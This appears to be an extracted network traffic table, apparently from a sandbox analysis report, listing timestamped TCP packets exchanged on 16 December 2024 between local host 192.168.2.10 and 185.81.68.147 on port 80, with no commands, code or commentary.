                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.427083969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.428642035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.428653955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.428664923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.428745031 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.429116964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.429214954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.430264950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.430277109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.430366039 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.430854082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.430866003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.430951118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.432137012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.432147980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.432158947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.432233095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.433094978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.433105946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.433116913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.433176994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.433198929 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.434753895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.434765100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.434776068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.434853077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.435795069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.435806990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.435817957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.435894966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.435918093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.437395096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.437407017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.437418938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.437498093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.438483953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.438494921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.438504934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.438580990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.438601971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.439836025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.439848900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.439946890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.440886021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.440897942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.440908909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.440983057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.441859007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.441869974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.441881895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.441952944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.441978931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.442868948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.442882061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.442970037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.444428921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.444439888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.444451094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.444529057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.445437908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.445449114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.445461035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.445533991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.445554018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.447030067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.447041988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.447052956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.447133064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.447261095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.447348118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.448054075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.448065996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.448154926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.448826075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.449925900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.449937105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.449948072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.450002909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.450028896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.451426029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.451436996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.451447010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.451523066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.451822042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.451920033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.453284025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.453295946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.453306913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.453377008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.454154968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.454164982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.454176903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.454252005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.454272985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.455806971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.455817938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.455828905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.455909967 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.456726074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.456737041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.456752062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.456820011 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.456844091 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.458422899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.458434105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.458445072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.458530903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.459471941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.459482908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.459494114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.459573030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.459593058 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.460807085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.460819006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.460947037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.462898970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.512156963 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.607434988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.607486963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.607634068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.607920885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.608326912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.608433008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.608712912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.608757973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.608863115 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.609524965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.609627962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.609728098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.610517025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.610656023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.610749960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.611459970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.611516953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.611605883 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.612191916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.612735033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.612823963 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.613250017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.613302946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.613385916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.614084005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.614116907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.614263058 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.614849091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.614994049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.615097046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.615816116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.615852118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.615968943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.616668940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.616708040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.616818905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.617551088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.617587090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.617692947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.618923903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.618959904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.619080067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.619275093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.619311094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.619401932 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.620333910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.620368004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.620441914 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.621402025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.621437073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.621556044 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.622648954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.622684002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.622771978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.623409986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.623445034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.623553038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.623569965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.623656988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.623732090 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.624855042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.624888897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.624965906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.625396013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.625818014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.625936985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.626595974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.626631975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.626737118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.627398014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.627434015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.627530098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.627976894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.628082991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.628175974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.629247904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.629285097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.629389048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.630563021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.630595922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.630630016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.630688906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.630877972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.630961895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.632062912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.632096052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.632186890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.632334948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.632432938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.632500887 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.633220911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.633313894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.633387089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.634303093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.634339094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.634411097 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.635257959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.635291100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.635376930 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.635907888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.636162043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.636274099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.636734009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.636822939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.637268066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.637764931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.637800932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.637892008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.639005899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.639039993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.639127016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.639688015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.639722109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.639817953 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.640569925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.640604973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.640695095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.641139984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.641258001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.641422987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.642254114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.642287970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.642386913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.643001080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.643035889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.643110037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.644644976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.644679070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.644711971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.644757032 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.645575047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.645621061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.645653009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.645654917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.645767927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.647569895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.647603035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.647634983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.647675991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.648225069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.648257971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.648292065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.648303986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.648329973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.649873972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.649905920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.649940968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.649976015 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.650897980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.650930882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.650964022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.650980949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.651002884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.651592016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.651886940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.651962996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.653317928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.653352022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.653383970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.653462887 CET4972380192.168.2.10185.81.68.147
